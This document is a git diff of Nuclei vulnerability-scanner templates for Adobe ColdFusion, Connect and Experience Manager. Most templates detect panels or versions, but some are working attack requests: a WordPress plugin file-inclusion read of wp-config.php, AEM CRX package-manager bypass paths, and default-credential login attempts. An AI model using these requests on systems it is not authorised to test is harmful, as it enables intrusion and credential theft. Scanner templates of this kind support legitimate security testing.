a/nuclei-templates/Other/adobe-coldfusion-detect-82.yaml +++ b/nuclei-templates/Other/adobe-coldfusion-detect-82.yaml @@ -5,9 +5,6 @@ info: author: philippedelteil severity: info description: With this template we can detect the version number of Coldfusion instances based on their logos. - metadata: - verified: true - shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion requests: diff --git a/nuclei-templates/Other/adobe-coldfusion-detector-error.yaml b/nuclei-templates/Other/adobe-coldfusion-detector-error.yaml deleted file mode 100644 index 68d056dd27..0000000000 --- a/nuclei-templates/Other/adobe-coldfusion-detector-error.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: adobe-coldfusion-detector-error -info: - name: Adobe ColdFusion Detector - author: philippedelteil - severity: info - description: With this template we can detect a running ColdFusion instance due to an error page. - reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358 - tags: adobe,coldfusion -requests: - - method: GET - path: - - "{{BaseURL}}/_something_.cfm" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'ColdFusion documentation' - - type: status - status: - - 404 diff --git a/nuclei-templates/Other/adobe-coldfusion-error-detect-87.yaml b/nuclei-templates/Other/adobe-coldfusion-error-detect-87.yaml new file mode 100644 index 0000000000..65c6b5a121 --- /dev/null +++ b/nuclei-templates/Other/adobe-coldfusion-error-detect-87.yaml @@ -0,0 +1,30 @@ +id: adobe-coldfusion-detector-error + +info: + name: Adobe ColdFusion Detector + author: philippedelteil + severity: info + description: With this template we can detect a running ColdFusion instance due to an error page. + reference: https://twitter.com/PhilippeDelteil/status/1418622775829348358 + tags: adobe,coldfusion + + +requests: + - raw: + - | + GET /_something_.cfm HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate + Accept: */* + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'ColdFusion documentation' + + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/adobe-connect-central-login-95.yaml b/nuclei-templates/Other/adobe-connect-central-login-95.yaml deleted file mode 100644 index fd70acd2de..0000000000 --- a/nuclei-templates/Other/adobe-connect-central-login-95.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-connect-central-login - -info: - name: Adobe Connect Central Login - author: dhiyaneshDk - severity: info - tags: adobe,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/system/login" - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Connect Central Login' - part: body - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adobe-connect-central-login.yaml b/nuclei-templates/Other/adobe-connect-central-login.yaml new file mode 100644 index 0000000000..1218c9f8d7 --- /dev/null +++ b/nuclei-templates/Other/adobe-connect-central-login.yaml @@ -0,0 +1,23 @@ +id: adobe-connect-central-login + +info: + name: Adobe Connect Central Login + author: dhiyaneshDk + severity: info + tags: adobe,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/system/login" + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Connect Central Login' + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/adobe-connect-username-exposure-101.yaml b/nuclei-templates/Other/adobe-connect-username-exposure-100.yaml similarity index 100% rename from nuclei-templates/Other/adobe-connect-username-exposure-101.yaml rename to nuclei-templates/Other/adobe-connect-username-exposure-100.yaml diff --git a/nuclei-templates/Other/adobe-connect-version-104.yaml b/nuclei-templates/Other/adobe-connect-version-102.yaml similarity index 100% rename from nuclei-templates/Other/adobe-connect-version-104.yaml rename to nuclei-templates/Other/adobe-connect-version-102.yaml diff --git a/nuclei-templates/Other/adobe-experience-manager-login-108.yaml b/nuclei-templates/Other/adobe-experience-manager-login-108.yaml new file mode 100644 index 0000000000..4dbdef1e18 --- /dev/null +++ b/nuclei-templates/Other/adobe-experience-manager-login-108.yaml @@ -0,0 +1,33 @@ +id: adobe-experience-manager-login + +info: + name: Adobe Experience Manager Login Panel + author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/adobe-experience-manager-login-109.yaml b/nuclei-templates/Other/adobe-experience-manager-login-109.yaml deleted file mode 100644 index 2162a6646f..0000000000 --- a/nuclei-templates/Other/adobe-experience-manager-login-109.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe-Experience-Manager - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - tags: panel,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/adobe-media-server-113.yaml b/nuclei-templates/Other/adobe-media-server-113.yaml new file mode 100644 index 0000000000..deaf55913a --- /dev/null +++ b/nuclei-templates/Other/adobe-media-server-113.yaml @@ -0,0 +1,23 @@ +id: adobe-media-server + +info: + name: Adobe Media Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/adobe-media-server.yaml b/nuclei-templates/Other/adobe-media-server.yaml deleted file mode 100644 index be87f46642..0000000000 --- a/nuclei-templates/Other/adobe-media-server.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: adobe-media-server - -info: - name: Adobe Media Server - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - tags: panel,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Media Server' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/advance-setup-119.yaml b/nuclei-templates/Other/advance-setup-119.yaml deleted file mode 100644 index bbee2bbcf7..0000000000 --- a/nuclei-templates/Other/advance-setup-119.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: advanced-setup-login - -info: - name: ActionTec Modem Advanced Setup Login Panel - author: dhiyaneshDK - severity: info - description: An ActionTec Modem Advanced Setup login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/6819 - - https://www.actiontec.com/dsl/ - classification: - cwe-id: CWE-200 - tags: panel,setup - -requests: - - method: GET - path: - - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Advanced Setup - Security - Admin User Name & Password' - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/advance-setup-122.yaml b/nuclei-templates/Other/advance-setup-122.yaml new file mode 100644 index 0000000000..629d3b1e84 --- /dev/null +++ b/nuclei-templates/Other/advance-setup-122.yaml @@ -0,0 +1,32 @@ +id: advanced-setup-login + +info: + name: ActionTec Modem Advanced Setup Login Panel + author: dhiyaneshDK + description: An ActionTec Modem Advanced Setup login panel was detected. + severity: info + reference: + - https://www.exploit-db.com/ghdb/6819 + - https://www.actiontec.com/dsl/ + tags: panel,setup + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Advanced Setup - Security - Admin User Name & Password' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml b/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml deleted file mode 100644 index 9838f210f1..0000000000 --- a/nuclei-templates/Other/advanced-access-manager-lfi-116.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: advanced-access-manager-lfi - -info: - name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion - author: 0x_Akoko - severity: high - description: The Advanced Access Manager WordPress plugin, versions before 5.9.9, allowed reading arbitrary files. This way one can download the wp-config.php file and get access to the database, which is publicly reachable on many servers. - reference: - - https://wpscan.com/vulnerability/9873 - - https://id.wordpress.org/plugins/advanced-access-manager/ - tags: wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - '{{BaseURL}}/?aam-media=wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/advanced-access-manager-lfi-118.yaml b/nuclei-templates/Other/advanced-access-manager-lfi-118.yaml new file mode 100644 index 0000000000..653f312d6c --- /dev/null +++ b/nuclei-templates/Other/advanced-access-manager-lfi-118.yaml @@ -0,0 +1,31 @@ +id: advanced-access-manager-lfi +info: + name: WordPress Advanced Access Manager <5.9.9 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers. + reference: + - https://wpscan.com/vulnerability/9873 + - https://id.wordpress.org/plugins/advanced-access-manager/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi +requests: + - method: GET + path: + - '{{BaseURL}}/?aam-media=wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aem-bg-servlet-129.yaml b/nuclei-templates/Other/aem-bg-servlet.yaml similarity index 100% rename from nuclei-templates/Other/aem-bg-servlet-129.yaml rename to nuclei-templates/Other/aem-bg-servlet.yaml diff --git a/nuclei-templates/Other/aem-cached-pages.yaml b/nuclei-templates/Other/aem-cached-pages-130.yaml similarity index 100% rename from nuclei-templates/Other/aem-cached-pages.yaml rename to nuclei-templates/Other/aem-cached-pages-130.yaml diff --git a/nuclei-templates/Other/aem-childrenlist-xss.yaml b/nuclei-templates/Other/aem-childrenlist-xss.yaml deleted file mode 100644 index 7b3378c4d8..0000000000 --- a/nuclei-templates/Other/aem-childrenlist-xss.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: aem-xss-childlist - -info: - name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting - author: theabhinavgaur - severity: medium - description: | - Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. - metadata: - verified: true - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - - -http: - - method: GET - path: - - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" - - "{{BaseURL}}/{{rand_base(4)}}

    please%20authenticate

    .childrenlist.html" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - '

    please authenticate

    ' - condition: or - - - type: word - part: body - words: - - 'data-coral-columnview-id' - - - type: word - part: content_type - words: - - 'text/html' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aem-crx-bypass-133.yaml b/nuclei-templates/Other/aem-crx-bypass-133.yaml new file mode 100644 index 0000000000..a6187d442a --- /dev/null +++ b/nuclei-templates/Other/aem-crx-bypass-133.yaml @@ -0,0 +1,41 @@ +id: aem-crx-bypass + +info: + author: dhiyaneshDK + name: AEM CRX Bypass + severity: critical + reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ + tags: aem + +requests: + - raw: + - | + GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + - | + GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'buildCount' + - 'downloadName' + - 'acHandling' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-crx-bypass.yaml b/nuclei-templates/Other/aem-crx-bypass.yaml deleted file mode 100644 index 6607f936be..0000000000 --- a/nuclei-templates/Other/aem-crx-bypass.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aem-crx-bypass -info: - author: dhiyaneshDK - name: AEM CRX Bypass - severity: critical - reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ - tags: aem -requests: - - raw: - - | - GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - - | - GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - Accept-Encoding: gzip, deflate - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'buildCount' - - 'downloadName' - - 'acHandling' - condition: and - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aem-default-get-servlet-137.yaml b/nuclei-templates/Other/aem-default-get-servlet-137.yaml deleted file mode 100644 index cd831dbd52..0000000000 --- a/nuclei-templates/Other/aem-default-get-servlet-137.yaml +++ /dev/null @@ -1,80 +0,0 @@ -id: aem-default-get-servlet -info: - author: DhiyaneshDk - name: AEM DefaultGetServlet - severity: low - reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/.json' - - '{{BaseURL}}/.1.json' - - '{{BaseURL}}/....4.2.1....json' - - '{{BaseURL}}/.json?FNZ.css' - - '{{BaseURL}}/.json?FNZ.ico' - - '{{BaseURL}}/.json?FNZ.html' - - '{{BaseURL}}/.json/FNZ.css' - - '{{BaseURL}}/.json/FNZ.html' - - '{{BaseURL}}/.json/FNZ.png' - - '{{BaseURL}}/.json/FNZ.ico' - - '{{BaseURL}}/.children.1.json' - - '{{BaseURL}}/.children....4.2.1....json' - - '{{BaseURL}}/.children.json?FNZ.css' - - '{{BaseURL}}/.children.json?FNZ.ico' - - '{{BaseURL}}/.children.json?FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.css' - - '{{BaseURL}}/.children.json/FNZ.html' - - '{{BaseURL}}/.children.json/FNZ.png' - - '{{BaseURL}}/.children.json/FNZ.ico' - - '{{BaseURL}}/etc.json' - - '{{BaseURL}}/etc.1.json' - - '{{BaseURL}}/etc....4.2.1....json' - - '{{BaseURL}}/etc.json?FNZ.css' - - '{{BaseURL}}/etc.json?FNZ.ico' - - '{{BaseURL}}/etc.json?FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.css' - - '{{BaseURL}}/etc.json/FNZ.html' - - '{{BaseURL}}/etc.json/FNZ.ico' - - '{{BaseURL}}/etc.children.json' - - '{{BaseURL}}/etc.children.1.json' - - '{{BaseURL}}/etc.children....4.2.1....json' - - '{{BaseURL}}/etc.children.json?FNZ.css' - - '{{BaseURL}}/etc.children.json?FNZ.ico' - - '{{BaseURL}}/etc.children.json?FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.css' - - '{{BaseURL}}/etc.children.json/FNZ.html' - - '{{BaseURL}}/etc.children.json/FNZ.png' - - '{{BaseURL}}/etc.children.json/FNZ.ico' - - '{{BaseURL}}///etc.json' - - '{{BaseURL}}///etc.1.json' - - '{{BaseURL}}///etc....4.2.1....json' - - '{{BaseURL}}///etc.json?FNZ.css' - - '{{BaseURL}}///etc.json?FNZ.ico' - - '{{BaseURL}}///etc.json/FNZ.html' - - '{{BaseURL}}///etc.json/FNZ.png' - - '{{BaseURL}}///etc.json/FNZ.ico' - - '{{BaseURL}}///etc.children.json' - - '{{BaseURL}}///etc.children.1.json' - - '{{BaseURL}}///etc.children....4.2.1....json' - - '{{BaseURL}}///etc.children.json?FNZ.css' - - '{{BaseURL}}///etc.children.json?FNZ.ico' - - '{{BaseURL}}///etc.children.json?FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.css' - - '{{BaseURL}}///etc.children.json/FNZ.html' - - '{{BaseURL}}///etc.children.json/FNZ.png' - - '{{BaseURL}}///etc.children.json/FNZ.ico' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'jcr:createdBy' - condition: and diff --git a/nuclei-templates/Other/aem-default-get-servlet.yaml b/nuclei-templates/Other/aem-default-get-servlet.yaml new file mode 100644 index 0000000000..7186c2256f --- /dev/null +++ b/nuclei-templates/Other/aem-default-get-servlet.yaml @@ -0,0 +1,80 @@ +id: aem-default-get-servlet +info: + author: DhiyaneshDk + name: AEM DefaultGetServlet + severity: low + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/.json' + - '{{BaseURL}}/.1.json' + - '{{BaseURL}}/....4.2.1....json' + - '{{BaseURL}}/.json?FNZ.css' + - '{{BaseURL}}/.json?FNZ.ico' + - '{{BaseURL}}/.json?FNZ.html' + - '{{BaseURL}}/.json/FNZ.css' + - '{{BaseURL}}/.json/FNZ.html' + - '{{BaseURL}}/.json/FNZ.png' + - '{{BaseURL}}/.json/FNZ.ico' + - '{{BaseURL}}/.children.1.json' + - '{{BaseURL}}/.children....4.2.1....json' + - '{{BaseURL}}/.children.json?FNZ.css' + - '{{BaseURL}}/.children.json?FNZ.ico' + - '{{BaseURL}}/.children.json?FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.css' + - '{{BaseURL}}/.children.json/FNZ.html' + - '{{BaseURL}}/.children.json/FNZ.png' + - '{{BaseURL}}/.children.json/FNZ.ico' + - '{{BaseURL}}/etc.json' + - '{{BaseURL}}/etc.1.json' + - '{{BaseURL}}/etc....4.2.1....json' + - '{{BaseURL}}/etc.json?FNZ.css' + - '{{BaseURL}}/etc.json?FNZ.ico' + - '{{BaseURL}}/etc.json?FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.css' + - '{{BaseURL}}/etc.json/FNZ.html' + - '{{BaseURL}}/etc.json/FNZ.ico' + - '{{BaseURL}}/etc.children.json' + - '{{BaseURL}}/etc.children.1.json' + - '{{BaseURL}}/etc.children....4.2.1....json' + - '{{BaseURL}}/etc.children.json?FNZ.css' + - '{{BaseURL}}/etc.children.json?FNZ.ico' + - '{{BaseURL}}/etc.children.json?FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.css' + - '{{BaseURL}}/etc.children.json/FNZ.html' + - '{{BaseURL}}/etc.children.json/FNZ.png' + - '{{BaseURL}}/etc.children.json/FNZ.ico' + - '{{BaseURL}}///etc.json' + - '{{BaseURL}}///etc.1.json' + - '{{BaseURL}}///etc....4.2.1....json' + - '{{BaseURL}}///etc.json?FNZ.css' + - '{{BaseURL}}///etc.json?FNZ.ico' + - '{{BaseURL}}///etc.json/FNZ.html' + - '{{BaseURL}}///etc.json/FNZ.png' + - '{{BaseURL}}///etc.json/FNZ.ico' + - '{{BaseURL}}///etc.children.json' + - '{{BaseURL}}///etc.children.1.json' + - '{{BaseURL}}///etc.children....4.2.1....json' + - '{{BaseURL}}///etc.children.json?FNZ.css' + - '{{BaseURL}}///etc.children.json?FNZ.ico' + - '{{BaseURL}}///etc.children.json?FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.css' + - '{{BaseURL}}///etc.children.json/FNZ.html' + - '{{BaseURL}}///etc.children.json/FNZ.png' + - '{{BaseURL}}///etc.children.json/FNZ.ico' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'jcr:createdBy' + condition: and diff --git a/nuclei-templates/Other/aem-default-login.yaml b/nuclei-templates/Other/aem-default-login.yaml index 5d614791b3..0f201e7c6b 100644 --- a/nuclei-templates/Other/aem-default-login.yaml +++ b/nuclei-templates/Other/aem-default-login.yaml @@ -1,18 +1,11 @@ id: aem-default-login + info: name: Adobe AEM Default Login author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: http.component:"Adobe Experience Manager" + severity: critical tags: aem,default-login,adobe + requests: - raw: - | @@ -23,6 +16,7 @@ requests: Referer: {{BaseURL}}/libs/granite/core/content/login.html _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true + attack: pitchfork payloads: aem_user: @@ -30,30 +24,23 @@ requests: - grios - replication-receiver - vgnadmin - - author - - anonymous - - jdoe@geometrixx.info - - aparker@geometrixx.info + aem_pass: - admin - password - replication-receiver - vgnadmin - - author - - anonymous - - jdoe - - aparker + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word part: header + condition: and words: - login-token - crx.default - condition: and - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/aem-detection-146.yaml b/nuclei-templates/Other/aem-detection-146.yaml new file mode 100644 index 0000000000..bb3d7e0753 --- /dev/null +++ b/nuclei-templates/Other/aem-detection-146.yaml @@ -0,0 +1,28 @@ +id: aem-detection + +info: + name: Favicon based AEM Detection + author: shifacyclewala,hackergautam + severity: info + reference: + - https://twitter.com/brsn76945860/status/1171233054951501824 + - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a + - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 + - https://github.com/devanshbatham/FavFreak + - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv + metadata: + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe + +requests: + - method: GET + path: + - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/nuclei-templates/Other/aem-detection.yaml b/nuclei-templates/Other/aem-detection.yaml deleted file mode 100644 index 421bb35f54..0000000000 --- a/nuclei-templates/Other/aem-detection.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-detection - -info: - name: Favicon based AEM Detection - severity: info - author: shifacyclewala,hackergautam - tags: aem,favicon,tech - reference: - - https://twitter.com/brsn76945860/status/1171233054951501824 - - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a - - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - - https://github.com/devanshbatham/FavFreak - - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv - metadata: - shodan-query: http.component:"Adobe Experience Manager" - -requests: - - method: GET - path: - - "{{BaseURL}}/libs/granite/core/content/login/favicon.ico" - - redirects: true - max-redirects: 2 - - matchers: - - type: dsl - dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/nuclei-templates/Other/aem-groovyconsole-154.yaml b/nuclei-templates/Other/aem-groovyconsole-154.yaml new file mode 100644 index 0000000000..7cac692c6b --- /dev/null +++ b/nuclei-templates/Other/aem-groovyconsole-154.yaml @@ -0,0 +1,28 @@ +id: aem-groovyconsole +info: + name: AEM Groovy console exposed + author: d3sca + severity: critical + description: Groovy console is exposed. + tags: aem +requests: + - method: GET + path: + - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/groovyconsole.html" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 + matchers-condition: and + matchers: + - type: word + words: + - "Groovy Console" + - "Run Script" + - "Groovy Web Console" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-groovyconsole-155.yaml b/nuclei-templates/Other/aem-groovyconsole-155.yaml deleted file mode 100644 index b37f3f8d94..0000000000 --- a/nuclei-templates/Other/aem-groovyconsole-155.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: aem-groovyconsole -info: - name: AEM Groovy Console Discovery - author: Dheerajmadhukar - severity: critical - description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. - reference: - - https://hackerone.com/reports/672243 - - https://twitter.com/XHackerx007/status/1435139576314671105 - tags: aem,adobe -requests: - - method: GET - path: - - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/etc/groovyconsole.html" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Groovy Console" - - "Run Script" - - "Groovy Web Console" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/Other/aem-hash-querybuilder-160.yaml b/nuclei-templates/Other/aem-hash-querybuilder-157.yaml similarity index 100% rename from nuclei-templates/Other/aem-hash-querybuilder-160.yaml rename to nuclei-templates/Other/aem-hash-querybuilder-157.yaml diff --git a/nuclei-templates/Other/aem-jcr-querybuilder-166.yaml b/nuclei-templates/Other/aem-jcr-querybuilder-165.yaml similarity index 100% rename from nuclei-templates/Other/aem-jcr-querybuilder-166.yaml rename to nuclei-templates/Other/aem-jcr-querybuilder-165.yaml diff --git a/nuclei-templates/Other/aem-login-status-169.yaml b/nuclei-templates/Other/aem-login-status-169.yaml new file mode 100644 index 0000000000..d8446f7869 --- /dev/null +++ b/nuclei-templates/Other/aem-login-status-169.yaml @@ -0,0 +1,24 @@ +id: aem-login-status + +info: + author: DhiyaneshDk + name: AEM Login Status + severity: info + reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/system/sling/loginstatus.css' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CREDENTIAL_CHALLENGE' + condition: and diff --git a/nuclei-templates/Other/aem-login-status.yaml b/nuclei-templates/Other/aem-login-status.yaml deleted file mode 100644 index 7a9051e7ef..0000000000 --- a/nuclei-templates/Other/aem-login-status.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aem-login-status - -info: - name: AEM Login Status - author: DhiyaneshDk - severity: info - description: LoginStatusServlet is exposed, it allows to bruteforce credentials. - reference: - - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java - tags: aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/system/sling/loginstatus' - - '{{BaseURL}}/system/sling/loginstatus.css' - - '{{BaseURL}}///system///sling///loginstatus' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CREDENTIAL_CHALLENGE' diff --git a/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml b/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml new file mode 100644 index 0000000000..4f840f4bca --- /dev/null +++ b/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml @@ -0,0 +1,23 @@ +id: aem-querybuilder-feed-servlet + +info: + author: DhiyaneshDk + name: AEM QueryBuilder Feed Servlet + severity: info + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.feed' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CQ Feed' \ No newline at end of file diff --git a/nuclei-templates/Other/aem-querybuilder-feed-servlet.yaml 